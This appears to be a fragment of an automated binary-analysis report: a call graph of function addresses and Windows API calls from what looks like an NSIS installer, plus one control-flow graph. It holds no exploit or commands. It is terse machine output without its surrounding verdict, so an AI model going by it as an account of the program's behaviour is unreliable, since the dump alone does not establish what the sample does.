4499->4502 4657 4063b0 lstrcpynW 4501->4657 4506 403727 4502->4506 4503->4488 4600 403abe 4504->4600 4506->4492 4506->4553 4521 403762 4508->4521 4510 403930 4513 4039b4 ExitProcess 4510->4513 4514 403938 GetCurrentProcess OpenProcessToken 4510->4514 4511 403810 4669 405a12 4511->4669 4519 403950 LookupPrivilegeValueW AdjustTokenPrivileges 4514->4519 4520 403984 4514->4520 4516 4037c0 4522 405d89 18 API calls 4516->4522 4517 403826 4523 40597d 5 API calls 4517->4523 4519->4520 4524 40678a 5 API calls 4520->4524 4521->4516 4521->4517 4525 4037cc 4522->4525 4526 40382b lstrcatW 4523->4526 4527 40398b 4524->4527 4525->4553 4658 4063b0 lstrcpynW 4525->4658 4528 403847 lstrcatW lstrcmpiW 4526->4528 4529 40383c lstrcatW 4526->4529 4530 4039a0 ExitWindowsEx 4527->4530 4531 4039ad 4527->4531 4533 403863 4528->4533 4528->4553 4529->4528 4530->4513 4530->4531 4675 40140b 4531->4675 4536 403868 4533->4536 4537 40386f 4533->4537 4535 4037db 4659 4063b0 lstrcpynW 4535->4659 4540 4058e3 4 API calls 4536->4540 4538 405960 2 API calls 4537->4538 4541 403874 SetCurrentDirectoryW 4538->4541 4542 40386d 4540->4542 4543 403884 4541->4543 4544 40388f 4541->4544 4542->4541 4673 4063b0 lstrcpynW 4543->4673 4674 4063b0 lstrcpynW 4544->4674 4547 4063d2 17 API calls 4548 4038ce DeleteFileW 4547->4548 4549 4038db CopyFileW 4548->4549 4554 40389d 4548->4554 4549->4554 4550 403924 4551 406176 36 API calls 4550->4551 4551->4553 4552 406176 36 API calls 4552->4554 4660 4039cc 4553->4660 4554->4547 4554->4550 4554->4552 4555 4063d2 17 API calls 4554->4555 4556 405995 2 API calls 4554->4556 4557 40390f CloseHandle 4554->4557 4555->4554 4556->4554 4557->4554 4558->4482 4559->4484 4561 406644 5 API calls 4560->4561 4562 403464 4561->4562 4563 40346e 4562->4563 4564 405c81 3 API calls 4562->4564 4563->4490 4565 403476 4564->4565 4566 405960 2 API calls 4565->4566 4567 40347c 4566->4567 4678 405ed1 4567->4678 4682 405ea2 GetFileAttributesW CreateFileW 4570->4682 4572 402f57 4599 402f64 4572->4599 4683 4063b0 lstrcpynW 4572->4683 4574 402f7a 4575 405ccd 2 API calls 4574->4575 4576 402f80 4575->4576 4684 4063b0 lstrcpynW 4576->4684 4578 402f8b GetFileSize 4579 40308c 4578->4579 4597 402fa2 4578->4597 4685 402e72 4579->4685 4583 403127 4586 402e72 32 API calls 4583->4586 4584 4030cf GlobalAlloc 4585 4030e6 4584->4585 4590 405ed1 2 API calls 4585->4590 4586->4599 4588 4030b0 4591 40342b ReadFile 4588->4591 4589 402e72 32 API calls 4589->4597 4593 4030f7 CreateFileW 4590->4593 4592 4030bb 4591->4592 4592->4584 4592->4599 4594 403131 4593->4594 4593->4599 4700 403441 SetFilePointer 4594->4700 4596 40313f 4701 4031ba 4596->4701 4597->4579 4597->4583 4597->4589 4597->4599 4716 40342b 4597->4716 4599->4497 4601 40678a 5 API calls 4600->4601 4602 403ad2 4601->4602 4603 403ad8 4602->4603 4604 403aea 4602->4604 4752 4062f7 wsprintfW 4603->4752 4605 40627e 3 API calls 4604->4605 4606 403b1a 4605->4606 4607 403b39 lstrcatW 4606->4607 4609 40627e 3 API calls 4606->4609 4610 403ae8 4607->4610 4609->4607 4744 403d94 4610->4744 4613 405d89 18 API calls 4614 403b6b 4613->4614 4615 403bff 4614->4615 4617 40627e 3 API calls 4614->4617 4616 405d89 18 API calls 4615->4616 4618 403c05 4616->4618 4620 403b9d 4617->4620 4619 403c15 LoadImageW 4618->4619 4621 4063d2 17 API calls 4618->4621 4622 403cbb 4619->4622 4623 403c3c RegisterClassW 4619->4623 4620->4615 4624 403bbe lstrlenW 4620->4624 4627 405cae CharNextW 4620->4627 4621->4619 4626 40140b 2 API calls 4622->4626 4625 403c72 SystemParametersInfoW CreateWindowExW 4623->4625 4656 403cc5 4623->4656 4628 403bf2 4624->4628 4629 403bcc lstrcmpiW 4624->4629 4625->4622 4630 403cc1 4626->4630 4631 403bbb 4627->4631 4633 405c81 3 API calls 4628->4633 4629->4628 4632 403bdc GetFileAttributesW 4629->4632 4635 403d94 18 API calls 4630->4635 4630->4656 4631->4624 4634 403be8 4632->4634 4636 403bf8 4633->4636 4634->4628 4637 405ccd 2 API calls 4634->4637 4638 403cd2 4635->4638 4753 4063b0 lstrcpynW 4636->4753 4637->4628 4640 403d61 4638->4640 4641 403cde ShowWindow 4638->4641 4754 4054e7 OleInitialize 4640->4754 4643 40671a 3 API calls 4641->4643 4645 403cf6 4643->4645 4644 403d67 4646 403d83 4644->4646 4647 403d6b 4644->4647 4648 403d04 GetClassInfoW 4645->4648 4650 40671a 3 API calls 4645->4650 4649 40140b 2 API calls 4646->4649 4654 40140b 2 API calls 4647->4654 4647->4656 4651 403d18 GetClassInfoW RegisterClassW 4648->4651 4652 403d2e DialogBoxParamW 4648->4652 4649->4656 4650->4648 4651->4652 4653 40140b 2 API calls 4652->4653 4655 403d56 4653->4655 4654->4656 4655->4656 4656->4553 4657->4503 4658->4535 4659->4504 4661 4039e7 4660->4661 4662 4039dd CloseHandle 4660->4662 4663 4039f1 CloseHandle 4661->4663 4664 4039fb 4661->4664 4662->4661 4663->4664 4772 403a29 4664->4772 4667 405abe 67 API calls 4668 4037ff OleUninitialize 4667->4668 4668->4510 4668->4511 4670 405a27 4669->4670 4671 40381e ExitProcess 4670->4671 4672 405a3b MessageBoxIndirectW 4670->4672 4672->4671 4673->4544 4674->4554 4676 401389 2 API calls 4675->4676 4677 401420 4676->4677 4677->4513 4679 405ede GetTickCount GetTempFileNameW 4678->4679 4680 405f14 4679->4680 4681 403487 4679->4681 4680->4679 4680->4681 4681->4490 4682->4572 4683->4574 4684->4578 4686 402e83 4685->4686 4687 402e9b 4685->4687 4688 402e93 4686->4688 4689 402e8c DestroyWindow 4686->4689 4690 402ea3 4687->4690 4691 402eab GetTickCount 4687->4691 4688->4584 4688->4599 4719 403441 SetFilePointer 4688->4719 4689->4688 4693 4067c6 2 API calls 4690->4693 4691->4688 4692 402eb9 4691->4692 4694 402ec1 4692->4694 4695 402eee CreateDialogParamW ShowWindow 4692->4695 4693->4688 4694->4688 4720 402e56 4694->4720 4695->4688 4697 402ecf wsprintfW 4698 405414 24 API calls 4697->4698 4699 402eec 4698->4699 4699->4688 4700->4596 4702 4031e5 4701->4702 4703 4031c9 SetFilePointer 4701->4703 4723 4032c2 GetTickCount 4702->4723 4703->4702 4706 405f25 ReadFile 4707 403205 4706->4707 4708 4032c2 42 API calls 4707->4708 4715 403282 4707->4715 4709 40321c 4708->4709 4710 403288 ReadFile 4709->4710 4713 40322b 4709->4713 4709->4715 4710->4715 4712 405f25 ReadFile 4712->4713 4713->4712 4714 405f54 WriteFile 4713->4714 4713->4715 4714->4713 4715->4599 4717 405f25 ReadFile 4716->4717 4718 40343e 4717->4718 4718->4597 4719->4588 4721 402e65 4720->4721 4722 402e67 MulDiv 4720->4722 4721->4722 4722->4697 4724 4032f0 4723->4724 4725 40341a 4723->4725 4736 403441 SetFilePointer 4724->4736 4726 402e72 32 API calls 4725->4726 4732 4031ec 4726->4732 4728 4032fb SetFilePointer 4734 403320 4728->4734 4729 40342b ReadFile 4729->4734 4731 402e72 32 API calls 4731->4734 4732->4706 4732->4715 4733 405f54 WriteFile 4733->4734 4734->4729 4734->4731 4734->4732 4734->4733 4735 4033fb SetFilePointer 4734->4735 4737 40690b 4734->4737 4735->4725 4736->4728 4738 406930 4737->4738 4741 406938 4737->4741 4738->4734 4739 4069c8 GlobalAlloc 4739->4738 4739->4741 4740 4069bf GlobalFree 4740->4739 4741->4738 4741->4739 4741->4740 4742 406a36 GlobalFree 4741->4742 4743 406a3f GlobalAlloc 4741->4743 4742->4743 4743->4738 4743->4741 4745 403da8 4744->4745 4761 4062f7 wsprintfW 4745->4761 4747 403e19 4762 403e4d 4747->4762 4749 403b49 4749->4613 4750 403e1e 4750->4749 4751 4063d2 17 API calls 4750->4751 4751->4750 4752->4610 4753->4615 4765 404391 4754->4765 4756 40550a 4760 405531 4756->4760 4768 401389 4756->4768 4757 404391 SendMessageW 4758 405543 OleUninitialize 4757->4758 4758->4644 4760->4757 4761->4747 4763 4063d2 17 API calls 4762->4763 4764 403e5b SetWindowTextW 4763->4764 4764->4750 4766 4043a9 4765->4766 4767 40439a SendMessageW 4765->4767 4766->4756 4767->4766 4770 401390 4768->4770 4769 4013fe 4769->4756 4770->4769 4771 4013cb MulDiv SendMessageW 4770->4771 4771->4770 4773 403a37 4772->4773 4774 403a00 4773->4774 4775 403a3c FreeLibrary GlobalFree 4773->4775 4774->4667 4775->4774 4775->4775 4776 401389 4778 401390 4776->4778 4777 4013fe 4778->4777 4779 4013cb MulDiv SendMessageW 4778->4779 4779->4778 5629 40190c 5630 401943 5629->5630 5631 402c37 17 API calls 5630->5631 5632 401948 5631->5632 5633 405abe 67 API calls 5632->5633 5634 401951 5633->5634 5635 401d0e 5636 402c15 17 API calls 5635->5636 5637 401d15 5636->5637 5638 402c15 17 API calls 5637->5638 5639 401d21 GetDlgItem 5638->5639 5640 40258c 5639->5640 5641 1000164f 5642 10001516 GlobalFree 5641->5642 5644 10001667 5642->5644 5643 100016ad GlobalFree 5644->5643 5645 10001682 5644->5645 5646 10001699 VirtualFree 5644->5646 5645->5643 5646->5643 5647 40190f 5648 402c37 17 API calls 5647->5648 5649 401916 5648->5649 5650 405a12 MessageBoxIndirectW 5649->5650 5651 40191f 5650->5651 5652 404d90 GetDlgItem GetDlgItem 5653 404de2 7 API calls 5652->5653 5661 404ffb 5652->5661 5654 404e85 DeleteObject 5653->5654 5655 404e78 SendMessageW 5653->5655 5656 404e8e 5654->5656 5655->5654 5658 404ec5 5656->5658 5660 4063d2 17 API calls 5656->5660 5657 4050df 5659 40518b 5657->5659 5668 405138 SendMessageW 5657->5668 5695 404fee 5657->5695 5662 404345 18 API calls 5658->5662 5664 405195 SendMessageW 5659->5664 5665 40519d 5659->5665 5666 404ea7 SendMessageW SendMessageW 5660->5666 5661->5657 5663 40506c 5661->5663 5671 404cde 5 API calls 5661->5671 5667 404ed9 5662->5667 5663->5657 5670 4050d1 SendMessageW 5663->5670 5664->5665 5676 4051b6 5665->5676 5677 4051af ImageList_Destroy 5665->5677 5688 4051c6 5665->5688 5666->5656 5672 404345 18 API calls 5667->5672 5674 40514d SendMessageW 5668->5674 5668->5695 5669 4043ac 8 API calls 5675 405381 5669->5675 5670->5657 5671->5663 5683 404ee7 5672->5683 5673 405335 5681 405347 ShowWindow GetDlgItem ShowWindow 5673->5681 5673->5695 5679 405160 5674->5679 5680 4051bf GlobalFree 5676->5680 5676->5688 5677->5676 5678 404fbc GetWindowLongW SetWindowLongW 5682 404fd5 5678->5682 5689 405171 SendMessageW 5679->5689 5680->5688 5681->5695 5684 404ff3 5682->5684 5685 404fdb ShowWindow 5682->5685 5683->5678 5687 404f37 SendMessageW 5683->5687 5690 404fb6 5683->5690 5692 404f73 SendMessageW 5683->5692 5693 404f84 SendMessageW 5683->5693 5704 40437a SendMessageW 5684->5704 5703 40437a SendMessageW 5685->5703 5687->5683 5688->5673 5694 404d5e 4 API calls 5688->5694 5699 405201 5688->5699 5689->5659 5690->5678 5690->5682 5692->5683 5693->5683 5694->5699 5695->5669 5696 40530b InvalidateRect 5696->5673 5697 405321 5696->5697 5705 404c99 5697->5705 5698 40522f SendMessageW 5702 405245 5698->5702 5699->5698 5699->5702 5701 4052b9 SendMessageW SendMessageW 5701->5702 5702->5696 5702->5701 5703->5695 5704->5661 5708 404bd0 5705->5708 5707 404cae 5707->5673 5709 404be9 5708->5709 5710 4063d2 17 API calls 5709->5710 5711 404c4d 5710->5711 5712 4063d2 17 API calls 5711->5712 5713 404c58 5712->5713 5714 4063d2 17 API calls 5713->5714 5715 404c6e lstrlenW wsprintfW SetDlgItemTextW 5714->5715 5715->5707 5716 401491 5717 405414 24 API calls 5716->5717 5718 401498 5717->5718 5719 402592 5720 4025c1 5719->5720 5721 4025a6 5719->5721 5723 4025f5 5720->5723 5724 4025c6 5720->5724 5722 402c15 17 API calls 5721->5722 5729 4025ad 5722->5729 5726 402c37 17 API calls 5723->5726 5725 402c37 17 API calls 5724->5725 5727 4025cd WideCharToMultiByte lstrlenA 5725->5727 5728 4025fc lstrlenW 5726->5728 5727->5729 5728->5729 5731 405f83 5 API calls 5729->5731 5732 40263f 5729->5732 5733 402629 5729->5733 5730 405f54 WriteFile 5730->5732 5731->5733 5733->5730 5733->5732 5734 404493 lstrlenW 5735 4044b2 5734->5735 5736 4044b4 WideCharToMultiByte 5734->5736 5735->5736 5737 404814 5738 404840 5737->5738 5739 404851 5737->5739 5798 4059f6 GetDlgItemTextW 5738->5798 5741 40485d GetDlgItem 5739->5741 5747 4048bc 5739->5747 5743 404871 5741->5743 5742 40484b 5745 406644 5 API calls 5742->5745 5749 404885 SetWindowTextW 5743->5749 5754 405d2c 4 API calls 5743->5754 5744 4049a0 5746 404b4f 5744->5746 5800 4059f6 GetDlgItemTextW 5744->5800 5745->5739 5753 4043ac 8 API calls 5746->5753 5747->5744 5747->5746 5750 4063d2 17 API calls 5747->5750 5752 404345 18 API calls 5749->5752 5755 404930 SHBrowseForFolderW 5750->5755 5751 4049d0 5756 405d89 18 API calls 5751->5756 5757 4048a1 5752->5757 5758 404b63 5753->5758 5759 40487b 5754->5759 5755->5744 5760 404948 CoTaskMemFree 5755->5760 5761 4049d6 5756->5761 5762 404345 18 API calls 5757->5762 5759->5749 5763 405c81 3 API calls 5759->5763 5764 405c81 3 API calls 5760->5764 5801 4063b0 lstrcpynW 5761->5801 5765 4048af 5762->5765 5763->5749 5766 404955 5764->5766 5799 40437a SendMessageW 5765->5799 5769 40498c SetDlgItemTextW 5766->5769 5774 4063d2 17 API calls 5766->5774 5769->5744 5770 4048b5 5772 40678a 5 API calls 5770->5772 5771 4049ed 5773 40678a 5 API calls 5771->5773 5772->5747 5781 4049f4 5773->5781 5775 404974 lstrcmpiW 5774->5775 5775->5769 5778 404985 lstrcatW 5775->5778 5776 404a35 5802 4063b0 lstrcpynW 5776->5802 5778->5769 5779 404a3c 5780 405d2c 4 API calls 5779->5780 5782 404a42 GetDiskFreeSpaceW 5780->5782 5781->5776 5784 405ccd 2 API calls 5781->5784 5786 404a8d 5781->5786 5785 404a66 MulDiv 5782->5785 5782->5786 5784->5781 5785->5786 5787 404afe 5786->5787 5788 404c99 20 API calls 5786->5788 5789 404b21 5787->5789 5791 40140b 2 API calls 5787->5791 5790 404aeb 5788->5790 5803 404367 EnableWindow 5789->5803 5793 404b00 SetDlgItemTextW 5790->5793 5794 404af0 5790->5794 5791->5789 5793->5787 5796 404bd0 20 API calls 5794->5796 5795 404b3d 5795->5746 5797 40476d SendMessageW 5795->5797 5796->5787 5797->5746 5798->5742 5799->5770 5800->5751 5801->5771 5802->5779 5803->5795 5804 10001058 5806 10001074 5804->5806 5805 100010dd 5806->5805 5807 10001516 GlobalFree 5806->5807 5808 10001092 5806->5808 5807->5808 5809 10001516 GlobalFree 5808->5809 5810 100010a2 5809->5810 5811 100010b2 5810->5811 5812 100010a9 GlobalSize 5810->5812 5813 100010b6 GlobalAlloc 5811->5813 5814 100010c7 5811->5814 5812->5811 5815 1000153d 3 API calls 5813->5815 5816 100010d2 GlobalFree 5814->5816 5815->5814 5816->5805 5817 401c19 5818 402c15 17 API calls 5817->5818 5819 401c20 5818->5819 5820 402c15 17 API calls 5819->5820 5821 401c2d 5820->5821 5822 402c37 17 API calls 5821->5822 5824 401c42 5821->5824 5822->5824 5823 401c52 5826 401ca9 5823->5826 5827 401c5d 5823->5827 5824->5823 5825 402c37 17 API calls 5824->5825 5825->5823 5828 402c37 17 API calls 5826->5828 5829 402c15 17 API calls 5827->5829 5830 401cae 5828->5830 5831 401c62 5829->5831 5832 402c37 17 API calls 5830->5832 5833 402c15 17 API calls 5831->5833 5834 401cb7 FindWindowExW 5832->5834 5835 401c6e 5833->5835 5838 401cd9 5834->5838 5836 401c99 SendMessageW 5835->5836 5837 401c7b SendMessageTimeoutW 5835->5837 5836->5838 5837->5838 5839 402a9a SendMessageW 5840 402ab4 InvalidateRect 5839->5840 5841 402abf 5839->5841 5840->5841 5842 40281b 5843 402821 5842->5843 5844 402829 FindClose 5843->5844 5845 402abf 5843->5845 5844->5845 5846 40149e 5847 4022f1 5846->5847 5848 4014ac PostQuitMessage 5846->5848 5848->5847 5856 100010e1 5859 10001111 5856->5859 5857 100011d8 GlobalFree 5858 100012ba 2 API calls 5858->5859 5859->5857 5859->5858 5860 100011d3 5859->5860 5861 10001272 2 API calls 5859->5861 5862 10001164 GlobalAlloc 5859->5862 5863 100011f8 GlobalFree 5859->5863 5864 100011c4 GlobalFree 5859->5864 5865 100012e1 lstrcpyW 5859->5865 5860->5857 5861->5864 5862->5859 5863->5859 5864->5859 5865->5859 5866 4029a2 5867 402c15 17 API calls 5866->5867 5868 4029a8 5867->5868 5869 4029e8 5868->5869 5870 4029cf 5868->5870 5877 402885 5868->5877 5872 402a02 5869->5872 5873 4029f2 5869->5873 5871 4029d4 5870->5871 5879 4029e5 5870->5879 5880 4063b0 lstrcpynW 5871->5880 5875 4063d2 17 API calls 5872->5875 5874 402c15 17 API calls 5873->5874 5874->5879 5875->5879 5879->5877 5881 4062f7 wsprintfW 5879->5881 5880->5877 5881->5877 4386 4015a3 4387 402c37 17 API calls 4386->4387 4388 4015aa SetFileAttributesW 4387->4388 4389 4015bc 4388->4389 5882 4028a7 5883 402c37 17 API calls 5882->5883 5884 4028b5 5883->5884 5885 4028cb 5884->5885 5886 402c37 17 API calls 5884->5886 5887 405e7d 2 API calls 5885->5887 5886->5885 5888 4028d1 5887->5888 5910 405ea2 GetFileAttributesW CreateFileW 5888->5910 5890 4028de 5891 402981 5890->5891 5892 4028ea GlobalAlloc 5890->5892 5895 402989 DeleteFileW 5891->5895 5896 40299c 5891->5896 5893 402903 5892->5893 5894 402978 CloseHandle 5892->5894 5911 403441 SetFilePointer 5893->5911 5894->5891 5895->5896 5898 402909 5899 40342b ReadFile 5898->5899 5900 402912 GlobalAlloc 5899->5900 5901 402922 5900->5901 5902 402956 5900->5902 5904 4031ba 44 API calls 5901->5904 5903 405f54 WriteFile 5902->5903 5905 402962 GlobalFree 5903->5905 5909 40292f 5904->5909 5906 4031ba 44 API calls 5905->5906 5907 402975 5906->5907 5907->5894 5908 40294d GlobalFree 5908->5902 5909->5908 5910->5890 5911->5898 4780 40202c 4781 4020f0 4780->4781 4782 40203e 4780->4782 4784 401423 24 API calls 4781->4784 4783 402c37 17 API calls 4782->4783 4785 402045 4783->4785 4791 40224a 4784->4791 4786 402c37 17 API calls 4785->4786 4787 40204e 4786->4787 4788 402064 LoadLibraryExW 4787->4788 4789 402056 GetModuleHandleW 4787->4789 4788->4781 4790 402075 4788->4790 4789->4788 4789->4790 4803 4067f9 WideCharToMultiByte 4790->4803 4794 402086 4797 4020a5 4794->4797 4798 40208e 4794->4798 4795 4020bf 4796 405414 24 API calls 4795->4796 4799 402096 4796->4799 4806 10001759 4797->4806 4800 401423 24 API calls 4798->4800 4799->4791 4801 4020e2 FreeLibrary 4799->4801 4800->4799 4801->4791 4804 406823 GetProcAddress 4803->4804 4805 402080 4803->4805 4804->4805 4805->4794 4805->4795 4807 10001789 4806->4807 4848 10001b18 4807->4848 4809 10001790 4810 100018a6 4809->4810 4811 100017a1 4809->4811 4812 100017a8 4809->4812 4810->4799 4896 10002286 4811->4896 4880 100022d0 4812->4880 4817 1000180c 4823 10001812 4817->4823 4824 1000184e 4817->4824 4818 100017ee 4909 100024a4 4818->4909 4819 100017d7 4833 100017cd 4819->4833 4906 10002b57 4819->4906 4820 100017be 4822 100017c4 4820->4822 4828 100017cf 4820->4828 4822->4833 4890 1000289c 4822->4890 4830 100015b4 3 API calls 4823->4830 4826 100024a4 10 API calls 4824->4826 4831 10001840 4826->4831 4827 100017f4 4920 100015b4 4827->4920 4900 10002640 4828->4900 4835 10001828 4830->4835 4847 10001895 4831->4847 4931 10002467 4831->4931 4833->4817 4833->4818 4838 100024a4 10 API calls 4835->4838 4837 100017d5 4837->4833 4838->4831 4840 1000189f GlobalFree 4840->4810 4844 10001881 4844->4847 4935 1000153d wsprintfW 4844->4935 4845 1000187a FreeLibrary 4845->4844 4847->4810 4847->4840 4938 1000121b GlobalAlloc 4848->4938 4850 10001b3c 4939 1000121b GlobalAlloc 4850->4939 4852 10001d7a GlobalFree GlobalFree GlobalFree 4853 10001d97 4852->4853 4859 10001de1 4852->4859 4855 10001dac 4853->4855 4856 100020ee 4853->4856 4853->4859 4854 10001b47 4854->4852 4857 10001c1d GlobalAlloc 4854->4857 4854->4859 4862 10001c68 lstrcpyW 4854->4862 4863 10001c86 GlobalFree 4854->4863 4865 10001c72 lstrcpyW 4854->4865 4870 10002048 4854->4870 4874 10001cc4 4854->4874 4875 10001f37 GlobalFree 4854->4875 4878 1000122c 2 API calls 4854->4878 4945 1000121b GlobalAlloc 4854->4945 4855->4859 4942 1000122c 4855->4942 4858 10002110 GetModuleHandleW 4856->4858 4856->4859 4857->4854 4860 10002121 LoadLibraryW 4858->4860 4861 10002136 4858->4861 4859->4809 4860->4859 4860->4861 4946 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4861->4946 4862->4865 4863->4854 4865->4854 4866 10002148 4867 10002188 4866->4867 4879 10002172 GetProcAddress 4866->4879 4867->4859 4868 10002195 lstrlenW 4867->4868 4947 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4868->4947 4870->4859 4873 10002090 lstrcpyW 4870->4873 4873->4859 4874->4854 4940 1000158f GlobalSize GlobalAlloc 4874->4940 4875->4854 4876 100021af 4876->4859 4878->4854 4879->4867 4887 100022e8 4880->4887 4881 1000122c GlobalAlloc lstrcpynW 4881->4887 4883 10002410 GlobalFree 4884 100017ae 4883->4884 4883->4887 4884->4819 4884->4820 4884->4833 4885 100023ba GlobalAlloc CLSIDFromString 4885->4883 4886 1000238f GlobalAlloc WideCharToMultiByte 4886->4883 4887->4881 4887->4883 4887->4885 4887->4886 4889 100023d9 4887->4889 4949 100012ba 4887->4949 4889->4883 4953 100025d4 4889->4953 4892 100028ae 4890->4892 4891 10002953 VirtualAllocEx 4893 10002971 4891->4893 4892->4891 4894 10002a62 GetLastError 4893->4894 4895 10002a6d 4893->4895 4894->4895 4895->4833 4897 10002296 4896->4897 4898 100017a7 4896->4898 4897->4898 4899 100022a8 GlobalAlloc 4897->4899 4898->4812 4899->4897 4904 1000265c 4900->4904 4901 100026c0 4903 100026c5 GlobalSize 4901->4903 4905 100026cf 4901->4905 4902 100026ad GlobalAlloc 4902->4905 4903->4905 4904->4901 4904->4902 4905->4837 4908 10002b62 4906->4908 4907 10002ba2 GlobalFree 4908->4907 4956 1000121b GlobalAlloc 4909->4956 4911 10002506 MultiByteToWideChar 4916 100024ae 4911->4916 4912 1000252b StringFromGUID2 4912->4916 4913 1000253c lstrcpynW 4913->4916 4914 1000256c GlobalFree 4914->4916 4915 1000254f wsprintfW 4915->4916 4916->4911 4916->4912 4916->4913 4916->4914 4916->4915 4917 100025a7 GlobalFree 4916->4917 4918 10001272 2 API calls 4916->4918 4957 100012e1 4916->4957 4917->4827 4918->4916 4961 1000121b GlobalAlloc 4920->4961 4922 100015ba 4923 100015c7 lstrcpyW 4922->4923 4925 100015e1 4922->4925 4926 100015fb 4923->4926 4925->4926 4927 100015e6 wsprintfW 4925->4927 4928 10001272 4926->4928 4927->4926 4929 100012b5 GlobalFree 4928->4929 4930 1000127b GlobalAlloc lstrcpynW 4928->4930 4929->4831 4930->4929 4932 10002475 4931->4932 4934 10001861 4931->4934 4933 10002491 GlobalFree 4932->4933 4932->4934 4933->4932 4934->4844 4934->4845 4936 10001272 2 API calls 4935->4936 4937 1000155e 4936->4937 4937->4847 4938->4850 4939->4854 4941 100015ad 4940->4941 4941->4874 4948 1000121b GlobalAlloc 4942->4948 4944 1000123b lstrcpynW 4944->4859 4945->4854 4946->4866 4947->4876 4948->4944 4950 100012c1 4949->4950 4951 1000122c 2 API calls 4950->4951 4952 100012df 4951->4952 4952->4887 4954 100025e2 VirtualAlloc 4953->4954 4955 10002638 4953->4955 4954->4955 4955->4889 4956->4916 4958 100012ea 4957->4958 4959 1000130c 4957->4959 4958->4959 4960 100012f0 lstrcpyW 4958->4960 4959->4916 4960->4959 4961->4922 5919 402a2f 5920 402c15 17 API calls 5919->5920 5921 402a35 5920->5921 5922 402a6c 5921->5922 5924 402885 5921->5924 5925 402a47 5921->5925 5923 4063d2 17 API calls 5922->5923 5922->5924 5923->5924 5925->5924 5927 4062f7 wsprintfW 5925->5927 5927->5924 5928 401a30 5929 402c37 17 API calls 5928->5929 5930 401a39 ExpandEnvironmentStringsW 5929->5930 5931 401a4d 5930->5931 5933 401a60 5930->5933 5932 401a52 lstrcmpW 5931->5932 5931->5933 5932->5933 5939 401db3 GetDC 5940 402c15 17 API calls 5939->5940 5941 401dc5 GetDeviceCaps MulDiv ReleaseDC 5940->5941 5942 402c15 17 API calls 5941->5942 5943 401df6 5942->5943 5944 4063d2 17 API calls 5943->5944 5945 401e33 CreateFontIndirectW 5944->5945 5946 40258c 5945->5946 5947 402835 5948 40283d 5947->5948 5949 402841 FindNextFileW 5948->5949 5950 402853 5948->5950 5949->5950 5951 4029e0 5950->5951 5953 4063b0 lstrcpynW 5950->5953 5953->5951 5954 401735 5955 402c37 17 API calls 5954->5955 5956 40173c SearchPathW 5955->5956 5957 4029e0 5956->5957 5958 401757 5956->5958 5958->5957 5960 4063b0 lstrcpynW 5958->5960 5960->5957 5961 10002a77 5962 10002a8f 5961->5962 5963 1000158f 2 API calls 5962->5963 5964 10002aaa 5963->5964 5965 4014b8 5966 4014be 5965->5966 5967 401389 2 API calls 5966->5967 5968 4014c6 5967->5968 5969 406aba 5973 40693e 5969->5973 5970 4072a9 5971 4069c8 GlobalAlloc 5971->5970 5971->5973 5972 4069bf GlobalFree 5972->5971 5973->5970 5973->5971 5973->5972 5974 406a36 GlobalFree 5973->5974 5975 406a3f GlobalAlloc 5973->5975 5974->5975 5975->5970 5975->5973

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 403489-4034c6 SetErrorMode GetVersion 1 4034c8-4034d0 call 40678a 0->1 2 4034d9 0->2 1->2 8 4034d2 1->8 3 4034de-4034f2 call 40671a lstrlenA 2->3 9 4034f4-403510 call 40678a * 3 3->9 8->2 16 403521-403582 #17 OleInitialize SHGetFileInfoW call 4063b0 GetCommandLineW call 4063b0 GetModuleHandleW 9->16 17 403512-403518 9->17 24 403584-40358b 16->24 25 40358c-4035a6 call 405cae CharNextW 16->25 17->16 22 40351a 17->22 22->16 24->25 28 4035ac-4035b2 25->28 29 4036bd-4036d7 GetTempPathW call 403458 25->29 31 4035b4-4035b9 28->31 32 4035bb-4035bf 28->32 36 4036d9-4036f7 GetWindowsDirectoryW lstrcatW call 403458 29->36 37 40372f-403749 DeleteFileW call 402f14 29->37 31->31 31->32 34 4035c1-4035c5 32->34 35 4035c6-4035ca 32->35 34->35 38 4035d0-4035d6 35->38 39 403689-403696 call 405cae 35->39 36->37 54 4036f9-403729 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403458 36->54 57 4037fa-40380a call 4039cc OleUninitialize 37->57 58 40374f-403755 37->58 43 4035f1-40362a 38->43 44 4035d8-4035e0 38->44 55 403698-403699 39->55 56 40369a-4036a0 39->56 45 403647-403681 43->45 46 40362c-403631 43->46 50 4035e2-4035e5 44->50 51 4035e7 44->51 45->39 53 403683-403687 45->53 46->45 52 403633-40363b 46->52 50->43 50->51 51->43 60 403642 52->60 61 40363d-403640 52->61 53->39 62 4036a8-4036b6 call 4063b0 53->62 54->37 54->57 55->56 56->28 64 4036a6 56->64 74 403930-403936 57->74 75 403810-403820 call 405a12 ExitProcess 57->75 65 4037ea-4037f1 call 403abe 58->65 66 40375b-403766 call 405cae 58->66 60->45 61->45 61->60 69 4036bb 62->69 64->69 73 4037f6 65->73 77 4037b4-4037be 66->77 78 403768-40379d 66->78 69->29 73->57 80 4039b4-4039bc 74->80 81 403938-40394e GetCurrentProcess OpenProcessToken 74->81 85 4037c0-4037ce call 405d89 77->85 86 403826-40383a call 40597d lstrcatW 77->86 82 40379f-4037a3 78->82 83 4039c2-4039c6 ExitProcess 80->83 84 4039be 80->84 88 403950-40397e LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403984-403992 call 40678a 81->89 90 4037a5-4037aa 82->90 91 4037ac-4037b0 82->91 84->83 85->57 99 4037d0-4037e6 call 4063b0 * 2 85->99 100 403847-403861 lstrcatW lstrcmpiW 86->100 101 40383c-403842 lstrcatW 86->101 88->89 102 4039a0-4039ab ExitWindowsEx 89->102 103 403994-40399e 89->103 90->91 95 4037b2 90->95 91->82 91->95 95->77 99->65 100->57 106 403863-403866 100->106 101->100 102->80 104 4039ad-4039af call 40140b 102->104 103->102 103->104 104->80 110 403868-40386d call 4058e3 106->110 111 40386f call 405960 106->111 115 403874-403882 SetCurrentDirectoryW 110->115 111->115 118 403884-40388a call 4063b0 115->118 119 40388f-4038b8 call 4063b0 115->119 118->119 123 4038bd-4038d9 call 4063d2 DeleteFileW 119->123 126 40391a-403922 123->126 127 4038db-4038eb CopyFileW 123->127 126->123 128 403924-40392b call 406176 126->128 127->126 129 4038ed-40390d call 406176 call 4063d2 call 405995 127->129 128->57 129->126 138 40390f-403916 CloseHandle 129->138 